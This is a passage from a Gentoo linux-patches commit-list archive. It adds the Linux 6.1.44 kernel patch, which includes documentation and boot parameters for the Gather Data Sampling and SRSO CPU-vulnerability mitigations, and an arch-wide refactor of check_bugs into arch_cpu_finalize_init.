+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
+index a44455372646a..08d4861c2e782 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
+@@ -131,5 +131,30 @@
+         "teardown": [
+             "echo \"1\" > /sys/bus/netdevsim/del_device"
+         ]
++    },
++    {
++        "id": "3e1e",
++        "name": "Add taprio Qdisc with an invalid cycle-time",
++        "category": [
++            "qdisc",
++            "taprio"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "echo \"1 1 8\" > /sys/bus/netdevsim/new_device",
++            "$TC qdisc add dev $ETH root handle 1: taprio num_tc 3 map 2 2 1 0 2 2 2 2 2 2 2 2 2 2 2 2 queues 1@0 1@0 1@0 base-time 1000000000 sched-entry S 01 300000 flags 0x1 clockid CLOCK_TAI cycle-time 4294967296 || /bin/true",
++            "$IP link set dev $ETH up",
++            "$IP addr add 10.10.10.10/24 dev $ETH"
++        ],
++        "cmdUnderTest": "/bin/true",
++        "expExitCode": "0",
++        "verifyCmd": "$TC qdisc show dev $ETH",
++        "matchPattern": "qdisc taprio 1: root refcnt",
++        "matchCount": "0",
++        "teardown": [
++            "echo \"1\" > /sys/bus/netdevsim/del_device"
++        ]
+     }
+ ]


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-08 18:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-08 18:40 UTC (permalink / raw
  To: gentoo-commits

commit:     44bf627114eb52a75a55341e74a081912edd6c12
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Aug  8 18:40:23 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Aug  8 18:40:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=44bf6271

Linux patch 6.1.44

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1043_linux-6.1.44.patch | 2841 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2845 insertions(+)

diff --git a/0000_README b/0000_README
index c3798828..12241a14 100644
--- a/0000_README
+++ b/0000_README
@@ -215,6 +215,10 @@ Patch:  1042_linux-6.1.43.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.43
 
+Patch:  1043_linux-6.1.44.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.44
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1043_linux-6.1.44.patch b/1043_linux-6.1.44.patch
new file mode 100644
index 00000000..0c2a79ff
--- /dev/null
+++ b/1043_linux-6.1.44.patch
@@ -0,0 +1,2841 @@
+diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu
+index f54867cadb0f6..13c01b641dc70 100644
+--- a/Documentation/ABI/testing/sysfs-devices-system-cpu
++++ b/Documentation/ABI/testing/sysfs-devices-system-cpu
+@@ -513,17 +513,18 @@ Description:	information about CPUs heterogeneity.
+ 		cpu_capacity: capacity of cpuX.
+ 
+ What:		/sys/devices/system/cpu/vulnerabilities
++		/sys/devices/system/cpu/vulnerabilities/gather_data_sampling
++		/sys/devices/system/cpu/vulnerabilities/itlb_multihit
++		/sys/devices/system/cpu/vulnerabilities/l1tf
++		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/meltdown
++		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
++		/sys/devices/system/cpu/vulnerabilities/retbleed
++		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v1
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v2
+-		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+-		/sys/devices/system/cpu/vulnerabilities/l1tf
+-		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/srbds
+ 		/sys/devices/system/cpu/vulnerabilities/tsx_async_abort
+-		/sys/devices/system/cpu/vulnerabilities/itlb_multihit
+-		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
+-		/sys/devices/system/cpu/vulnerabilities/retbleed
+ Date:		January 2018
+ Contact:	Linux kernel mailing list <linux-kernel@vger.kernel.org>
+ Description:	Information about CPU vulnerabilities
+diff --git a/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst b/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst
+new file mode 100644
+index 0000000000000..264bfa937f7de
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst
+@@ -0,0 +1,109 @@
++.. SPDX-License-Identifier: GPL-2.0
++
++GDS - Gather Data Sampling
++==========================
++
++Gather Data Sampling is a hardware vulnerability which allows unprivileged
++speculative access to data which was previously stored in vector registers.
++
++Problem
++-------
++When a gather instruction performs loads from memory, different data elements
++are merged into the destination vector register. However, when a gather
++instruction that is transiently executed encounters a fault, stale data from
++architectural or internal vector registers may get transiently forwarded to the
++destination vector register instead. This will allow a malicious attacker to
++infer stale data using typical side channel techniques like cache timing
++attacks. GDS is a purely sampling-based attack.
++
++The attacker uses gather instructions to infer the stale vector register data.
++The victim does not need to do anything special other than use the vector
++registers. The victim does not need to use gather instructions to be
++vulnerable.
++
++Because the buffers are shared between Hyper-Threads cross Hyper-Thread attacks
++are possible.
++
++Attack scenarios
++----------------
++Without mitigation, GDS can infer stale data across virtually all
++permission boundaries:
++
++	Non-enclaves can infer SGX enclave data
++	Userspace can infer kernel data
++	Guests can infer data from hosts
++	Guest can infer guest from other guests
++	Users can infer data from other users
++
++Because of this, it is important to ensure that the mitigation stays enabled in
++lower-privilege contexts like guests and when running outside SGX enclaves.
++
++The hardware enforces the mitigation for SGX. Likewise, VMMs should  ensure
++that guests are not allowed to disable the GDS mitigation. If a host erred and
++allowed this, a guest could theoretically disable GDS mitigation, mount an
++attack, and re-enable it.
++
++Mitigation mechanism
++--------------------
++This issue is mitigated in microcode. The microcode defines the following new
++bits:
++
++ ================================   ===   ============================
++ IA32_ARCH_CAPABILITIES[GDS_CTRL]   R/O   Enumerates GDS vulnerability
++                                          and mitigation support.
++ IA32_ARCH_CAPABILITIES[GDS_NO]     R/O   Processor is not vulnerable.
++ IA32_MCU_OPT_CTRL[GDS_MITG_DIS]    R/W   Disables the mitigation
++                                          0 by default.
++ IA32_MCU_OPT_CTRL[GDS_MITG_LOCK]   R/W   Locks GDS_MITG_DIS=0. Writes
++                                          to GDS_MITG_DIS are ignored
++                                          Can't be cleared once set.
++ ================================   ===   ============================
++
++GDS can also be mitigated on systems that don't have updated microcode by
++disabling AVX. This can be done by setting gather_data_sampling="force" or
++"clearcpuid=avx" on the kernel command-line.
++
++If used, these options will disable AVX use by turning off XSAVE YMM support.
++However, the processor will still enumerate AVX support.  Userspace that
++does not follow proper AVX enumeration to check both AVX *and* XSAVE YMM
++support will break.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++The mitigation can be disabled by setting "gather_data_sampling=off" or
++"mitigations=off" on the kernel command line. Not specifying either will default
++to the mitigation being enabled. Specifying "gather_data_sampling=force" will
++use the microcode mitigation when available or disable AVX on affected systems
++where the microcode hasn't been updated to include the mitigation.
++
++GDS System Information
++------------------------
++The kernel provides vulnerability status information through sysfs. For
++GDS this can be accessed by the following sysfs file:
++
++/sys/devices/system/cpu/vulnerabilities/gather_data_sampling
++
++The possible values contained in this file are:
++
++ ============================== =============================================
++ Not affected                   Processor not vulnerable.
++ Vulnerable                     Processor vulnerable and mitigation disabled.
++ Vulnerable: No microcode       Processor vulnerable and microcode is missing
++                                mitigation.
++ Mitigation: AVX disabled,
++ no microcode                   Processor is vulnerable and microcode is missing
++                                mitigation. AVX disabled as mitigation.
++ Mitigation: Microcode          Processor is vulnerable and mitigation is in
++                                effect.
++ Mitigation: Microcode (locked) Processor is vulnerable and mitigation is in
++                                effect and cannot be disabled.
++ Unknown: Dependent on
++ hypervisor status              Running on a virtual guest processor that is
++                                affected but with no way to know if host
++                                processor is mitigated or vulnerable.
++ ============================== =============================================
++
++GDS Default mitigation
++----------------------
++The updated microcode will enable the mitigation by default. The kernel's
++default action is to leave the mitigation enabled.
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index e0614760a99e7..6828102baaa7a 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -19,3 +19,5 @@ are configurable at compile, boot or run time.
+    l1d_flush.rst
+    processor_mmio_stale_data.rst
+    cross-thread-rsb.rst
++   gather_data_sampling.rst
++   srso
+diff --git a/Documentation/admin-guide/hw-vuln/srso.rst b/Documentation/admin-guide/hw-vuln/srso.rst
+new file mode 100644
+index 0000000000000..2f923c805802f
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/srso.rst
+@@ -0,0 +1,133 @@
++.. SPDX-License-Identifier: GPL-2.0
++
++Speculative Return Stack Overflow (SRSO)
++========================================
++
++This is a mitigation for the speculative return stack overflow (SRSO)
++vulnerability found on AMD processors. The mechanism is by now the well
++known scenario of poisoning CPU functional units - the Branch Target
++Buffer (BTB) and Return Address Predictor (RAP) in this case - and then
++tricking the elevated privilege domain (the kernel) into leaking
++sensitive data.
++
++AMD CPUs predict RET instructions using a Return Address Predictor (aka
++Return Address Stack/Return Stack Buffer). In some cases, a non-architectural
++CALL instruction (i.e., an instruction predicted to be a CALL but is
++not actually a CALL) can create an entry in the RAP which may be used
++to predict the target of a subsequent RET instruction.
++
++The specific circumstances that lead to this varies by microarchitecture
++but the concern is that an attacker can mis-train the CPU BTB to predict
++non-architectural CALL instructions in kernel space and use this to
++control the speculative target of a subsequent kernel RET, potentially
++leading to information disclosure via a speculative side-channel.
++
++The issue is tracked under CVE-2023-20569.
++
++Affected processors
++-------------------
++
++AMD Zen, generations 1-4. That is, all families 0x17 and 0x19. Older
++processors have not been investigated.
++
++System information and options
++------------------------------
++
++First of all, it is required that the latest microcode be loaded for
++mitigations to be effective.
++
++The sysfs file showing SRSO mitigation status is:
++
++  /sys/devices/system/cpu/vulnerabilities/spec_rstack_overflow
++
++The possible values in this file are:
++
++ - 'Not affected'               The processor is not vulnerable
++
++ - 'Vulnerable: no microcode'   The processor is vulnerable, no
++                                microcode extending IBPB functionality
++                                to address the vulnerability has been
++                                applied.
++
++ - 'Mitigation: microcode'      Extended IBPB functionality microcode
++                                patch has been applied. It does not
++                                address User->Kernel and Guest->Host
++                                transitions protection but it does
++                                address User->User and VM->VM attack
++                                vectors.
++
++                                (spec_rstack_overflow=microcode)
++
++ - 'Mitigation: safe RET'       Software-only mitigation. It complements
++                                the extended IBPB microcode patch
++                                functionality by addressing User->Kernel
++                                and Guest->Host transitions protection.
++
++                                Selected by default or by
++                                spec_rstack_overflow=safe-ret
++
++ - 'Mitigation: IBPB'           Similar protection as "safe RET" above
++                                but employs an IBPB barrier on privilege
++                                domain crossings (User->Kernel,
++                                Guest->Host).
++
++                                (spec_rstack_overflow=ibpb)
++
++ - 'Mitigation: IBPB on VMEXIT' Mitigation addressing the cloud provider
++                                scenario - the Guest->Host transitions
++                                only.
++
++                                (spec_rstack_overflow=ibpb-vmexit)
++
++In order to exploit vulnerability, an attacker needs to:
++
++ - gain local access on the machine
++
++ - break kASLR
++
++ - find gadgets in the running kernel in order to use them in the exploit
++
++ - potentially create and pin an additional workload on the sibling
++   thread, depending on the microarchitecture (not necessary on fam 0x19)
++
++ - run the exploit
++
++Considering the performance implications of each mitigation type, the
++default one is 'Mitigation: safe RET' which should take care of most
++attack vectors, including the local User->Kernel one.
++
++As always, the user is advised to keep her/his system up-to-date by
++applying software updates regularly.
++
++The default setting will be reevaluated when needed and especially when
++new attack vectors appear.
++
++As one can surmise, 'Mitigation: safe RET' does come at the cost of some
++performance depending on the workload. If one trusts her/his userspace
++and does not want to suffer the performance impact, one can always
++disable the mitigation with spec_rstack_overflow=off.
++
++Similarly, 'Mitigation: IBPB' is another full mitigation type employing
++an indrect branch prediction barrier after having applied the required
++microcode patch for one's system. This mitigation comes also at
++a performance cost.
++
++Mitigation: safe RET
++--------------------
++
++The mitigation works by ensuring all RET instructions speculate to
++a controlled location, similar to how speculation is controlled in the
++retpoline sequence.  To accomplish this, the __x86_return_thunk forces
++the CPU to mispredict every function return using a 'safe return'
++sequence.
++
++To ensure the safety of this mitigation, the kernel must ensure that the
++safe return sequence is itself free from attacker interference.  In Zen3
++and Zen4, this is accomplished by creating a BTB alias between the
++untraining function srso_untrain_ret_alias() and the safe return
++function srso_safe_ret_alias() which results in evicting a potentially
++poisoned BTB entry and using that safe one for all function returns.
++
++In older Zen1 and Zen2, this is accomplished using a reinterpretation
++technique similar to Retbleed one: srso_untrain_ret() and
++srso_safe_ret().
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 6b838869554b1..286be425f3bfa 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -1593,6 +1593,26 @@
+ 			Format: off | on
+ 			default: on
+ 
++	gather_data_sampling=
++			[X86,INTEL] Control the Gather Data Sampling (GDS)
++			mitigation.
++
++			Gather Data Sampling is a hardware vulnerability which
++			allows unprivileged speculative access to data which was
++			previously stored in vector registers.
++
++			This issue is mitigated by default in updated microcode.
++			The mitigation may have a performance impact but can be
++			disabled. On systems without the microcode mitigation
++			disabling AVX serves as a mitigation.
++
++			force:	Disable AVX to mitigate systems without
++				microcode mitigation. No effect if the microcode
++				mitigation is present. Known to cause crashes in
++				userspace with buggy AVX enumeration.
++
++			off:	Disable GDS mitigation.
++
+ 	gcov_persist=	[GCOV] When non-zero (default), profiling data for
+ 			kernel modules is saved and remains accessible via
+ 			debugfs, even when the module is unloaded/reloaded.
+@@ -3228,24 +3248,25 @@
+ 				Disable all optional CPU mitigations.  This
+ 				improves system performance, but it may also
+ 				expose users to several CPU vulnerabilities.
+-				Equivalent to: nopti [X86,PPC]
+-					       if nokaslr then kpti=0 [ARM64]
+-					       nospectre_v1 [X86,PPC]
+-					       nobp=0 [S390]
+-					       nospectre_v2 [X86,PPC,S390,ARM64]
+-					       spectre_v2_user=off [X86]
+-					       spec_store_bypass_disable=off [X86,PPC]
+-					       ssbd=force-off [ARM64]
+-					       nospectre_bhb [ARM64]
++				Equivalent to: if nokaslr then kpti=0 [ARM64]
++					       gather_data_sampling=off [X86]
++					       kvm.nx_huge_pages=off [X86]
+ 					       l1tf=off [X86]
+ 					       mds=off [X86]
+-					       tsx_async_abort=off [X86]
+-					       kvm.nx_huge_pages=off [X86]
+-					       srbds=off [X86,INTEL]
++					       mmio_stale_data=off [X86]
+ 					       no_entry_flush [PPC]
+ 					       no_uaccess_flush [PPC]
+-					       mmio_stale_data=off [X86]
++					       nobp=0 [S390]
++					       nopti [X86,PPC]
++					       nospectre_bhb [ARM64]
++					       nospectre_v1 [X86,PPC]
++					       nospectre_v2 [X86,PPC,S390,ARM64]
+ 					       retbleed=off [X86]
++					       spec_store_bypass_disable=off [X86,PPC]
++					       spectre_v2_user=off [X86]
++					       srbds=off [X86,INTEL]
++					       ssbd=force-off [ARM64]
++					       tsx_async_abort=off [X86]
+ 
+ 				Exceptions:
+ 					       This does not have any effect on
+@@ -5764,6 +5785,17 @@
+ 			Not specifying this option is equivalent to
+ 			spectre_v2_user=auto.
+ 
++	spec_rstack_overflow=
++			[X86] Control RAS overflow mitigation on AMD Zen CPUs
++
++			off		- Disable mitigation
++			microcode	- Enable microcode mitigation only
++			safe-ret	- Enable sw-only safe RET mitigation (default)
++			ibpb		- Enable mitigation by issuing IBPB on
++					  kernel entry
++			ibpb-vmexit	- Issue IBPB only on VMEXIT
++					  (cloud-specific mitigation)
++
+ 	spec_store_bypass_disable=
+ 			[HW] Control Speculative Store Bypass (SSB) Disable mitigation
+ 			(Speculative Store Bypass vulnerability)
+diff --git a/Makefile b/Makefile
+index 69cdd0d2946c3..612f3d83629b4 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 43
++SUBLEVEL = 44
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 81599f5c17b0f..b60d271bf76a9 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -285,6 +285,9 @@ config ARCH_HAS_DMA_SET_UNCACHED
+ config ARCH_HAS_DMA_CLEAR_UNCACHED
+ 	bool
+ 
++config ARCH_HAS_CPU_FINALIZE_INIT
++	bool
++
+ # Select if arch init_task must go in the __init_task_data section
+ config ARCH_TASK_STRUCT_ON_STACK
+ 	bool
+diff --git a/arch/alpha/include/asm/bugs.h b/arch/alpha/include/asm/bugs.h
+deleted file mode 100644
+index 78030d1c7e7e0..0000000000000
+--- a/arch/alpha/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/*
+- *  include/asm-alpha/bugs.h
+- *
+- *  Copyright (C) 1994  Linus Torvalds
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-/*
+- * I don't know of any alpha bugs yet.. Nice chip
+- */
+-
+-static void check_bugs(void)
+-{
+-}
+diff --git a/arch/arm/Kconfig b/arch/arm/Kconfig
+index 0202e48e7a207..6d5afe2e6ba33 100644
+--- a/arch/arm/Kconfig
++++ b/arch/arm/Kconfig
+@@ -5,6 +5,7 @@ config ARM
+ 	select ARCH_32BIT_OFF_T
+ 	select ARCH_CORRECT_STACKTRACE_ON_KRETPROBE if HAVE_KRETPROBES && FRAME_POINTER && !ARM_UNWIND
+ 	select ARCH_HAS_BINFMT_FLAT
++	select ARCH_HAS_CPU_FINALIZE_INIT if MMU
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DEBUG_VIRTUAL if MMU
+ 	select ARCH_HAS_DMA_WRITE_COMBINE if !ARM_DMA_MEM_BUFFERABLE
+diff --git a/arch/arm/include/asm/bugs.h b/arch/arm/include/asm/bugs.h
+index 97a312ba08401..fe385551edeca 100644
+--- a/arch/arm/include/asm/bugs.h
++++ b/arch/arm/include/asm/bugs.h
+@@ -1,7 +1,5 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- *  arch/arm/include/asm/bugs.h
+- *
+  *  Copyright (C) 1995-2003 Russell King
+  */
+ #ifndef __ASM_BUGS_H
+@@ -10,10 +8,8 @@
+ extern void check_writebuffer_bugs(void);
+ 
+ #ifdef CONFIG_MMU
+-extern void check_bugs(void);
+ extern void check_other_bugs(void);
+ #else
+-#define check_bugs() do { } while (0)
+ #define check_other_bugs() do { } while (0)
+ #endif
+ 
+diff --git a/arch/arm/kernel/bugs.c b/arch/arm/kernel/bugs.c
+index 14c8dbbb7d2df..087bce6ec8e9b 100644
+--- a/arch/arm/kernel/bugs.c
++++ b/arch/arm/kernel/bugs.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/init.h>
++#include <linux/cpu.h>
+ #include <asm/bugs.h>
+ #include <asm/proc-fns.h>
+ 
+@@ -11,7 +12,7 @@ void check_other_bugs(void)
+ #endif
+ }
+ 
+-void __init check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	check_writebuffer_bugs();
+ 	check_other_bugs();
+diff --git a/arch/ia64/Kconfig b/arch/ia64/Kconfig
+index c6e06cdc738f0..283b751cbf6ab 100644
+--- a/arch/ia64/Kconfig
++++ b/arch/ia64/Kconfig
+@@ -9,6 +9,7 @@ menu "Processor type and features"
+ config IA64
+ 	bool
+ 	select ARCH_BINFMT_ELF_EXTRA_PHDRS
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_DMA_MARK_CLEAN
+ 	select ARCH_HAS_STRNCPY_FROM_USER
+ 	select ARCH_HAS_STRNLEN_USER
+diff --git a/arch/ia64/include/asm/bugs.h b/arch/ia64/include/asm/bugs.h
+deleted file mode 100644
+index 0d6b9bded56c6..0000000000000
+--- a/arch/ia64/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- *
+- * Based on <asm-alpha/bugs.h>.
+- *
+- * Modified 1998, 1999, 2003
+- *	David Mosberger-Tang <davidm@hpl.hp.com>,  Hewlett-Packard Co.
+- */
+-#ifndef _ASM_IA64_BUGS_H
+-#define _ASM_IA64_BUGS_H
+-
+-#include <asm/processor.h>
+-
+-extern void check_bugs (void);
+-
+-#endif /* _ASM_IA64_BUGS_H */
+diff --git a/arch/ia64/kernel/setup.c b/arch/ia64/kernel/setup.c
+index c057280442727..9009f1871e3b8 100644
+--- a/arch/ia64/kernel/setup.c
++++ b/arch/ia64/kernel/setup.c
+@@ -1067,8 +1067,7 @@ cpu_init (void)
+ 	}
+ }
+ 
+-void __init
+-check_bugs (void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	ia64_patch_mckinley_e9((unsigned long) __start___mckinley_e9_bundles,
+ 			       (unsigned long) __end___mckinley_e9_bundles);
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index e737dc8cd660c..270742cc3ca49 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,6 +10,7 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index ae436def7ee98..29725b37b35ca 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -12,6 +12,7 @@
+  */
+ #include <linux/init.h>
+ #include <linux/acpi.h>
++#include <linux/cpu.h>
+ #include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/export.h>
+@@ -80,6 +81,11 @@ const char *get_system_type(void)
+ 	return "generic-loongson-machine";
+ }
+ 
++void __init arch_cpu_finalize_init(void)
++{
++	alternative_instructions();
++}
++
+ static const char *dmi_string_parse(const struct dmi_header *dm, u8 s)
+ {
+ 	const u8 *bp = ((u8 *) dm) + dm->length;
+diff --git a/arch/m68k/Kconfig b/arch/m68k/Kconfig
+index 7bff881185070..1fe5b20187457 100644
+--- a/arch/m68k/Kconfig
++++ b/arch/m68k/Kconfig
+@@ -4,6 +4,7 @@ config M68K
+ 	default y
+ 	select ARCH_32BIT_OFF_T
+ 	select ARCH_HAS_BINFMT_FLAT
++	select ARCH_HAS_CPU_FINALIZE_INIT if MMU
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DMA_PREP_COHERENT if HAS_DMA && MMU && !COLDFIRE
+ 	select ARCH_HAS_SYNC_DMA_FOR_DEVICE if HAS_DMA
+diff --git a/arch/m68k/include/asm/bugs.h b/arch/m68k/include/asm/bugs.h
+deleted file mode 100644
+index 745530651e0bf..0000000000000
+--- a/arch/m68k/include/asm/bugs.h
++++ /dev/null
+@@ -1,21 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  include/asm-m68k/bugs.h
+- *
+- *  Copyright (C) 1994  Linus Torvalds
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-#ifdef CONFIG_MMU
+-extern void check_bugs(void);	/* in arch/m68k/kernel/setup.c */
+-#else
+-static void check_bugs(void)
+-{
+-}
+-#endif
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index fbff1cea62caa..6f1ae01f322cf 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -10,6 +10,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/cpu.h>
+ #include <linux/mm.h>
+ #include <linux/sched.h>
+ #include <linux/delay.h>
+@@ -504,7 +505,7 @@ static int __init proc_hardware_init(void)
+ module_init(proc_hardware_init);
+ #endif
+ 
+-void check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ #if defined(CONFIG_FPU) && !defined(CONFIG_M68KFPU_EMU)
+ 	if (m68k_fputype == 0) {
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 7b0856c76c9ad..cf1fbf4eaa8a0 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -4,6 +4,7 @@ config MIPS
+ 	default y
+ 	select ARCH_32BIT_OFF_T if !64BIT
+ 	select ARCH_BINFMT_ELF_STATE if MIPS_FP_SUPPORT
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER if !CC_IS_CLANG || CLANG_VERSION >= 140000
+ 	select ARCH_HAS_DEBUG_VIRTUAL if !64BIT
+ 	select ARCH_HAS_FORTIFY_SOURCE
+diff --git a/arch/mips/include/asm/bugs.h b/arch/mips/include/asm/bugs.h
+index d72dc6e1cf3cd..8d4cf29861b87 100644
+--- a/arch/mips/include/asm/bugs.h
++++ b/arch/mips/include/asm/bugs.h
+@@ -1,17 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ /*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+  * Copyright (C) 2007  Maciej W. Rozycki
+- *
+- * Needs:
+- *	void check_bugs(void);
+  */
+ #ifndef _ASM_BUGS_H
+ #define _ASM_BUGS_H
+ 
+ #include <linux/bug.h>
+-#include <linux/delay.h>
+ #include <linux/smp.h>
+ 
+ #include <asm/cpu.h>
+@@ -30,17 +24,6 @@ static inline void check_bugs_early(void)
+ 		check_bugs64_early();
+ }
+ 
+-static inline void check_bugs(void)
+-{
+-	unsigned int cpu = smp_processor_id();
+-
+-	cpu_data[cpu].udelay_val = loops_per_jiffy;
+-	check_bugs32();
+-
+-	if (IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
+-		check_bugs64();
+-}
+-
+ static inline int r4k_daddiu_bug(void)
+ {
+ 	if (!IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index 81dbb4ef52317..7c540572f1f72 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -11,6 +11,8 @@
+  * Copyright (C) 2000, 2001, 2002, 2007	 Maciej W. Rozycki
+  */
+ #include <linux/init.h>
++#include <linux/cpu.h>
++#include <linux/delay.h>
+ #include <linux/ioport.h>
+ #include <linux/export.h>
+ #include <linux/screen_info.h>
+@@ -840,3 +842,14 @@ static int __init setnocoherentio(char *str)
+ }
+ early_param("nocoherentio", setnocoherentio);
+ #endif
++
++void __init arch_cpu_finalize_init(void)
++{
++	unsigned int cpu = smp_processor_id();
++
++	cpu_data[cpu].udelay_val = loops_per_jiffy;
++	check_bugs32();
++
++	if (IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
++		check_bugs64();
++}
+diff --git a/arch/parisc/include/asm/bugs.h b/arch/parisc/include/asm/bugs.h
+deleted file mode 100644
+index 0a7f9db6bd1c7..0000000000000
+--- a/arch/parisc/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  include/asm-parisc/bugs.h
+- *
+- *  Copyright (C) 1999	Mike Shaver
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-#include <asm/processor.h>
+-
+-static inline void check_bugs(void)
+-{
+-//	identify_cpu(&boot_cpu_data);
+-}
+diff --git a/arch/powerpc/include/asm/bugs.h b/arch/powerpc/include/asm/bugs.h
+deleted file mode 100644
+index 01b8f6ca4dbbc..0000000000000
+--- a/arch/powerpc/include/asm/bugs.h
++++ /dev/null
+@@ -1,15 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-#ifndef _ASM_POWERPC_BUGS_H
+-#define _ASM_POWERPC_BUGS_H
+-
+-/*
+- */
+-
+-/*
+- * This file is included by 'init/main.c' to check for
+- * architecture-dependent bugs.
+- */
+-
+-static inline void check_bugs(void) { }
+-
+-#endif	/* _ASM_POWERPC_BUGS_H */
+diff --git a/arch/sh/Kconfig b/arch/sh/Kconfig
+index 8e4d1f757bcc9..a0593f6ce0e0f 100644
+--- a/arch/sh/Kconfig
++++ b/arch/sh/Kconfig
+@@ -7,6 +7,7 @@ config SUPERH
+ 	select ARCH_HAVE_CUSTOM_GPIO_H
